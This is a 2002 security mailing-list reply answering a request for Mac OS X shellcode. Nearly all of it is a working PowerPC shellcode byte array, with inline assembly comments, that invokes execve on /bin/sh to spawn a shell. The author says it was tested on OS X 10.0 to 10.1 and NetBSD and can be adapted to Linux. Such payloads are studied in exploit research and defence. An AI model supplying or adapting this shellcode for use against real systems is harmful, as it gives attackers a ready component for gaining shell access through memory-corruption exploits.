Re: OS X Shell Code

[ghandi <ghandi () dopesquad net>]

Here is some shellcode that I wrote a while back.  It was written and
tested on a G3 running OSX 10.0.x - 10.1.x.  IIRC it worked fine on NetBSD
also (same syscall number for execve) and fine on Linux with a changed
system call number.  The assembly language source and header files are
available at http://www.dopesquad.net/security.

/* PPC MacOS X (maybe others) shellcode
 *
 * ghandi <ghandi () mindless com>
 */
char shellcode[] =
  "\x7c\xa5\x2a\x79"  /* xor.   r5, r5, r5    ; r5 = NULL           */
  "\x40\xa2\xff\xfd"  /* bnel   shellcode                           */
  "\x7f\xe8\x02\xa6"  /* mflr   r31                                 */
  "\x3b\xff\x01\x30"  /* addi   r31, r31, 268+36                    */
  "\x38\x7f\xfe\xf4"  /* addi   r3, r31, -268 ; r3 = path           */
  "\x90\x61\xff\xf8"  /* stw    r3, -8(r1)    ; argv[0] = path      */
  "\x90\xa1\xff\xfc"  /* stw    r5, -4(r1)    ; argv[1] = NULL      */
  "\x38\x81\xff\xf8"  /* subi   r4, r1, 8     ; r4 = {path, 0}      */
  "\x3b\xc0\x76\x01"  /* li     r30, 30209                          */
  "\x7f\xc0\x4e\x70"  /* srawi  r0, r30, 9                          */
  "\x44\xff\xff\x02"  /* sc                   ; execve(r3, r4, r5)  */
  "/bin/sh"
;


--
           ghandi / ghandi () mindless com / www.dopesquad.net
       "Bein' Crazy is the least of my worries." - Jack Kerouac
          C439 2B06 D8D2 A2D8 1ABB  0A55 A61D 9057 63F5 9B1F


On Thu, 10 Jan 2002, Josha Bronson wrote:

> Greetins VulnDev,
>
> Anyone have some pointers (hah.. punny..) to shellcode examples for OS
> X?
>
> Thanks in advance,
> --
> Josha Bronson
> dmuz () angrypacket com
> AngryPacket Security